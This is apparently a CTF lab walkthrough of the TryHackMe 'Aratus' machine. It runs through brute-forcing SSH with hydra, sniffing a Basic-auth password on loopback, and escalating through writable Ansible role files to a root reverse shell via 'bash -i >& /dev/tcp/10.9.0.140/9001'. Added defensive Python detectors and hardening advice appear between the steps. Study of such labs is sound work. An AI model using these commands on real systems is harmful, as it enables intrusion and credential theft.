
Aratus (SSH, Process, Ansible)

First, we enumerate the open ports and services with nmap.

$ nmap -A -p21,22,80,139,443 10.10.184.32

Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-30 13:13 +0630
Nmap scan report for 10.10.184.32
Host is up (0.28s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0               6 Jun 09  2021 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.0.140
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
|   256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_  256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)
80/tcp  open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
|_http-title: Apache HTTP Server Test Page powered by CentOS
139/tcp open  netbios-ssn Samba smbd 4.10.16 (workgroup: WORKGROUP)
Service Info: Host: ARATUS; OS: Unix

Host script results:
|_clock-skew: mean: -40m50s, deviation: 1h09m13s, median: -53s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.10.16)
|   Computer name: aratus
|   NetBIOS computer name: ARATUS\x00
|   Domain name: \x00
|   FQDN: aratus
|_  System time: 2022-03-30T08:43:22+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-30T06:43:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.70 seconds

Let's connect to the FTP service and see what files it shares. Anonymous login is allowed, but the only directory is pub, and it is empty.

➜  tryhackme ftp 10.10.184.32
Connected to 10.10.184.32.
220 (vsFTPd 3.0.2)
Name (10.10.184.32:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0               6 Jun 09  2021 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

Enumerating the SMB shares, we find an interesting share named temporary share.

➜  tryhackme smbclient -L '\\10.10.184.32\'
Enter WORKGROUP\hnl's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	temporary share Disk      
	IPC$            IPC       IPC Service (Samba 4.10.16)
SMB1 disabled -- no workgroup available

Connect to it and see what files are stored in the share, then download message-to-simeon.txt. When I tried to download .bash_history or similar files, I got an access denied error.

➜  tryhackme smbclient '\\10.10.184.32\temporary share'
Enter WORKGROUP\hnl's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 10 19:36:44 2022
  ..                                  D        0  Tue Nov 23 22:54:05 2021
  .bash_logout                        H       18  Wed Apr  1 08:47:30 2020
  .bash_profile                       H      193  Wed Apr  1 08:47:30 2020
  .bashrc                             H      231  Wed Apr  1 08:47:30 2020
  .bash_history                       H        0  Wed Mar 30 13:07:29 2022
  chapter1                            D        0  Tue Nov 23 16:37:47 2021
  chapter2                            D        0  Tue Nov 23 16:38:11 2021
  chapter3                            D        0  Tue Nov 23 16:38:18 2021
  chapter4                            D        0  Tue Nov 23 16:38:25 2021
  chapter5                            D        0  Tue Nov 23 16:38:33 2021
  chapter6                            D        0  Tue Nov 23 16:42:24 2021
  chapter7                            D        0  Tue Nov 23 17:44:27 2021
  chapter8                            D        0  Tue Nov 23 16:42:45 2021
  chapter9                            D        0  Tue Nov 23 16:42:53 2021
  .ssh                               DH        0  Mon Jan 10 19:35:34 2022
  .viminfo                            H        0  Wed Mar 30 13:07:29 2022
  message-to-simeon.txt               N      251  Mon Jan 10 19:36:44 2022

		37726212 blocks of size 1024. 35598956 blocks available
smb: \> get message-to-simeon.txt
getting file \message-to-simeon.txt of size 251 as message-to-simeon.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Read this interesting file. From the message, it appears that Simeon has placed the web directory inside his home directory under /home.

➜  aratus cat message-to-simeon.txt 
Simeon,

Stop messing with your home directory, you are moving files and directories insecurely!
Just make a folder in /opt for your book project...

Also you password is insecure, could you please change it? It is all over the place now!

- Theodore

Let's enumerate the HTTP service. We find only the default httpd test page, which tells us the host runs CentOS or Red Hat.

http://10.10.184.32/simeon/ points to an interesting page. There are many words on this page and its subpages.

So, we will turn those words into a wordlist.

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  cewl http://10.10.184.32/simeon/ --with-numbers > wordlists.txt

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  cat wordlists.txt| wc -c 
1588

Then we brute-force SSH using this wordlist.

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  hydra -l simeon -P wordlists.txt ssh://10.10.184.32         
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-31 11:00:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 207 login tries (l:1/p:207), ~13 tries per task
[DATA] attacking ssh://10.10.184.32:22/
[22][ssh] host: 10.10.184.32   login: simeon   password: scelerisque
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-31 11:00:36

After the brute force, we have a valid username and password. Let's log in to SSH with these credentials.

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  ssh simeon@10.10.184.32
The authenticity of host '10.10.184.32 (10.10.184.32)' can't be established.
ECDSA key fingerprint is SHA256:5CxDqeYb3rPlNvmv3Hd+R2ZZuwoGQ/2fuul51QgP/N0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.184.32' (ECDSA) to the list of known hosts.
simeon@10.10.184.32's password: 
Last failed login: Thu Mar 31 16:59:44 CEST 2022 from ip-10-9-0-140.eu-west-1.compute.internal on ssh:notty
There were 34 failed login attempts since the last successful login.
Last login: Mon Jan 10 14:07:52 2022 from 172.16.42.100
[simeon@aratus ~]$ whoami
simeon
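The login banner above already records the attack from the defender's side: 34 failed attempts between two successful logins. The following is an added example, not part of the original write-up, showing how a detector could pick that pattern out of sshd's auth log. The log lines are constructed in the CentOS /var/log/secure format (the year is assumed to be 2022, since syslog timestamps omit it); the threshold and window values are assumptions for illustration. A burst of failures from one source followed by an accepted login from the same source is the highest-severity case, because it means the guess succeeded.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the sshd /var/log/secure format; not taken from the target.
SAMPLE_LOG = """\
Mar 31 11:00:10 aratus sshd[2101]: Failed password for simeon from 10.9.0.140 port 51002 ssh2
Mar 31 11:00:11 aratus sshd[2103]: Failed password for simeon from 10.9.0.140 port 51004 ssh2
Mar 31 11:00:12 aratus sshd[2105]: Failed password for invalid user admin from 10.9.0.140 port 51006 ssh2
Mar 31 11:00:13 aratus sshd[2107]: Failed password for simeon from 10.9.0.140 port 51008 ssh2
Mar 31 11:00:14 aratus sshd[2109]: Failed password for simeon from 10.9.0.140 port 51010 ssh2
Mar 31 11:00:36 aratus sshd[2111]: Accepted password for simeon from 10.9.0.140 port 51012 ssh2
Mar 31 11:05:00 aratus sshd[2200]: Failed password for theodore from 172.16.42.100 port 40000 ssh2
Mar 31 11:07:00 aratus sshd[2202]: Accepted password for theodore from 172.16.42.100 port 40002 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ACCEPT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_ts(text, year=2022):
    """Syslog timestamps carry no year; the year is an assumed constant here."""
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def find_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return one alert per source IP that produced >= threshold failures
    inside any window_seconds span, noting any later successful login
    from the same IP (the 'guess succeeded' case)."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            failures[m["ip"]].append(parse_ts(m["ts"]))
            continue
        m = ACCEPT_RE.match(line)
        if m:
            successes[m["ip"]].append((parse_ts(m["ts"]), m["user"]))

    alerts = []
    for ip, times in failures.items():
        times.sort()
        # Sliding window: largest number of failures within window_seconds.
        best, start = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            last_fail = times[-1]
            success_after = [u for t, u in successes.get(ip, []) if t >= last_fail]
            alerts.append({"ip": ip, "failures_in_window": best,
                           "success_after": success_after})
    return alerts


if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_LOG):
        print(alert)
```

On the sample above the detector raises a single alert for 10.9.0.140 with five failures in the window and a subsequent accepted login for simeon; the lone failure from 172.16.42.100 stays below the threshold. The fix on the host side is the one Theodore's note already asks for (a strong password), ideally with password authentication disabled in sshd_config in favour of keys.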

After checking the running processes, we find something interesting: a ping command running with root privileges.

Checking again with pspy64, we find another interesting process, which runs /home/theodore/scripts/test-www-auth.py.

We have already seen that ping is running as root. Let's listen on the loopback interface with tcpdump.

[simeon@aratus tmp]$ tcpdump -i lo -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
17:18:01.060141 IP localhost > localhost: ICMP echo request, id 2018, seq 1, length 64
E..T..@.@.b............7....).Eb............................ !"#$%&'()*+,-./01234567
17:18:01.060162 IP localhost > localhost: ICMP echo reply, id 2018, seq 1, length 64
E..T....@..............7....).Eb............................ !"#$%&'()*+,-./01234567
17:18:01.231426 IP localhost.39816 > localhost.http: Flags [S], seq 3134750690, win 43690, options [mss 65495,sackOK,TS val 1727142 ecr 0,nop,wscale 7], length 0
E..<%D@.@..v...........P.............0.........
..Z.........
17:18:01.231455 IP localhost.http > localhost.39816: Flags [S.], seq 2506469898, ack 3134750691, win 43690, options [mss 65495,sackOK,TS val 1727142 ecr 1727142,nop,wscale 7], length 0
E..<..@.@.<..........P...e.
.........0.........
..Z...Z.....
17:18:01.231470 IP localhost.39816 > localhost.http: Flags [.], ack 1, win 342, options [nop,nop,TS val 1727142 ecr 1727142], length 0
E..4%E@.@..}...........P.....e.....V.(.....
..Z...Z.
17:18:01.231734 IP localhost.39816 > localhost.http: Flags [P.], seq 1:224, ack 1, win 342, options [nop,nop,TS val 1727142 ecr 1727142], length 223: HTTP: GET /test-auth/index.html HTTP/1.1
E...%F@.@..............P.....e.....V.......
..Z...Z.GET /test-auth/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.14.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Authorization: Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
17:16:02.936270 IP localhost > localhost: ICMP echo request, id 1992, seq 2, length 64
17:16:02.936291 IP localhost > localhost: ICMP echo reply, id 1992, seq 2, length 64
17:16:03.936265 IP localhost > localhost: ICMP echo request, id 1992, seq 3, length 64
17:16:03.936287 IP localhost > localhost: ICMP echo reply, id 1992, seq 3, length 64
17:16:04.936267 IP localhost > localhost: ICMP echo request, id 1992, seq 4, length 64

Decode the value from base64, and you will find theodore's password.

╭─kali@kali ~/Desktop/tools  
╰─➤  echo 'dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=' | base64 -d
theodore:Rijyaswahebceibarjik                

Let's log in to SSH using theodore's credentials.

╭─kali@kali ~/Desktop/tools  
╰─➤  ssh theodore@10.10.184.32 
theodore@10.10.184.32's password: 
Last login: Fri Mar 25 21:57:42 2022
[theodore@aratus ~]$ whoami
theodore
[theodore@aratus ~]$ cat /home/theodore/scripts/test-www-auth.py
#!/usr/bin/python3

import requests

url = "http://127.0.0.1/test-auth/index.html"
headers = {"Authorization" : "Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs="}

r = requests.get(url, headers=headers)
print(r)
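The same secret leaked twice here: once on the wire, because the script sends HTTP Basic credentials over plaintext to port 80, and once at rest, because the script hardcodes the encoded header. The following is an added example, not from the original write-up or the target's own script, showing one scanner that catches both: it finds `Basic <token>` strings in any text (a tcpdump -A dump or a source file), decodes them, and reports the user name with the password masked. The two sample inputs are constructed from the capture and the script shown above.

```python
import base64
import binascii
import re

# Constructed from the tcpdump -A output shown above (one HTTP request, decoded ASCII).
CAPTURE = """\
GET /test-auth/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.14.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Authorization: Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=
"""

# Constructed copy of the script body shown above, as a secrets-scanning target.
SCRIPT_SOURCE = """\
import requests

url = "http://127.0.0.1/test-auth/index.html"
headers = {"Authorization" : "Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs="}

r = requests.get(url, headers=headers)
print(r)
"""

BASIC_RE = re.compile(r"Basic\s+([A-Za-z0-9+/]+={0,2})")


def decode_basic_token(token):
    """Return (user, password) if token is valid base64 of 'user:password', else None."""
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" not in raw:
        return None
    user, _, password = raw.partition(":")
    return user, password


def find_basic_credentials(text, source):
    """Scan text line by line for Basic auth tokens; never return the clear password."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in BASIC_RE.finditer(line):
            creds = decode_basic_token(m.group(1))
            if creds is None:
                continue  # not a real credential (e.g. the word "Basic" in prose)
            user, password = creds
            findings.append({
                "source": source,
                "line": lineno,
                "user": user,
                "password_length": len(password),
                "password_masked": password[:2] + "*" * (len(password) - 2),
            })
    return findings


if __name__ == "__main__":
    for finding in find_basic_credentials(CAPTURE, "tcpdump"):
        print(finding)
    for finding in find_basic_credentials(SCRIPT_SOURCE, "test-www-auth.py"):
        print(finding)
```

Both inputs yield one finding for user theodore with a 20-character password. Either finding alone is enough to act on: the script should read the credential from a file only theodore can read, and the check it performs should go over TLS or the loopback-only service should not use a reusable account password at all.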

The sudo -l command shows that theodore can run a script as the automation user without a password.

[theodore@aratus ~]$ sudo -l
Matching Defaults entries for theodore on aratus:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User theodore may run the following commands on aratus:
    (automation) NOPASSWD: /opt/scripts/infra_as_code.sh


[theodore@aratus ~]$ cat /opt/scripts/infra_as_code.sh
#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yaml

Ansible is running on this host (you can read about Ansible online). The script runs every playbook in /opt/ansible/playbooks/.

[theodore@aratus tasks]$ pwd
/opt/ansible/roles/geerlingguy.apache/tasks
[theodore@aratus tasks]$ ls -al
total 36
drwxr-xr-x. 2 automation automation  228 Dec  2 11:55 .
drwxr-xr-x. 9 automation automation  178 Dec  2 11:55 ..
-rw-rw-r--. 1 automation automation 1693 Dec  2 11:55 configure-Debian.yml
-rw-rw-r--+ 1 automation automation 1123 Dec  2 11:55 configure-RedHat.yml
-rw-rw-r--. 1 automation automation  546 Dec  2 11:55 configure-Solaris.yml
-rw-rw-r--. 1 automation automation  711 Dec  2 11:55 configure-Suse.yml
-rw-rw-r--. 1 automation automation 1388 Dec  2 11:55 main.yml
-rw-rw-r--. 1 automation automation  193 Dec  2 11:55 setup-Debian.yml
-rw-rw-r--. 1 automation automation  198 Dec  2 11:55 setup-RedHat.yml
-rw-rw-r--. 1 automation automation  134 Dec  2 11:55 setup-Solaris.yml
-rw-rw-r--. 1 automation automation  133 Dec  2 11:55 setup-Suse.yml
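The listing above is the weak point: role files executed through a sudo rule are group-writable, and the `+` on configure-RedHat.yml marks an extended ACL that ls does not show in full. The following is an added example, not from the original write-up, of an audit that walks a directory of playbooks or roles and flags anything group- or world-writable by mode bits, plus any entry carrying an extended ACL (read via the Linux `system.posix_acl_access` xattr, which is assumed to be present; on other platforms the ACL check simply reports nothing). The demo builds its own scratch directory with constructed file names and modes, so it runs without the target.

```python
import os
import stat
import tempfile


def has_extended_acl(path):
    """True if the entry carries a POSIX ACL beyond its mode bits (Linux only)."""
    try:
        os.getxattr(path, "system.posix_acl_access", follow_symlinks=False)
    except AttributeError:  # os.getxattr does not exist on non-Linux platforms
        return False
    except OSError:  # ENODATA: no extended ACL; or unsupported filesystem
        return False
    return True


def audit_tree(root):
    """Return (relative path, reason) for every entry a non-owner could modify."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mode = os.lstat(path).st_mode
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            elif mode & stat.S_IWGRP:
                findings.append((rel, "group-writable"))
            if has_extended_acl(path):
                findings.append((rel, "extended ACL present; inspect with getfacl"))
    return findings


def writable_by_caller(path):
    """Live check from the invoking user's point of view; honours ACLs via access(2)."""
    return os.access(path, os.W_OK)


def demo():
    """Constructed scratch tree mirroring the modes seen in the listing above."""
    with tempfile.TemporaryDirectory() as root:
        samples = [("main.yml", 0o644),
                   ("configure-RedHat.yml", 0o664),
                   ("setup-Debian.yml", 0o666)]
        for name, mode in samples:
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write("- name: placeholder task\n")
            os.chmod(path, mode)
        return sorted(audit_tree(root))


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:14} {rel}")
```

On the scratch tree the audit reports configure-RedHat.yml as group-writable and setup-Debian.yml as world-writable while leaving main.yml alone. On a real host the remediation is to make everything under /opt/ansible owned and writable only by the account that runs it, remove stray ACL entries with setfacl, and avoid sudo rules that let a lower-privileged user trigger playbooks at all.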

We create a reverse shell script in the /tmp directory.

[theodore@aratus tasks]$ cat /tmp/shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.9.0.140/9001 0>&1
[theodore@aratus tasks]$ chmod 777 /tmp/shell.sh

At the end of the file, we insert the malicious task definitions.

Run the playbooks.

[theodore@aratus ~]$ sudo -u automation /opt/scripts/infra_as_code.sh

In the netcat listener, we get a reverse shell as root.

╭─kali@kali ~/Desktop/ctf/tryhackme/aratus  
╰─➤  nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.0.140] from (UNKNOWN) [10.10.184.32] 32926
[root@aratus automation]# whoami;hostname
whoami;hostname
root
aratus
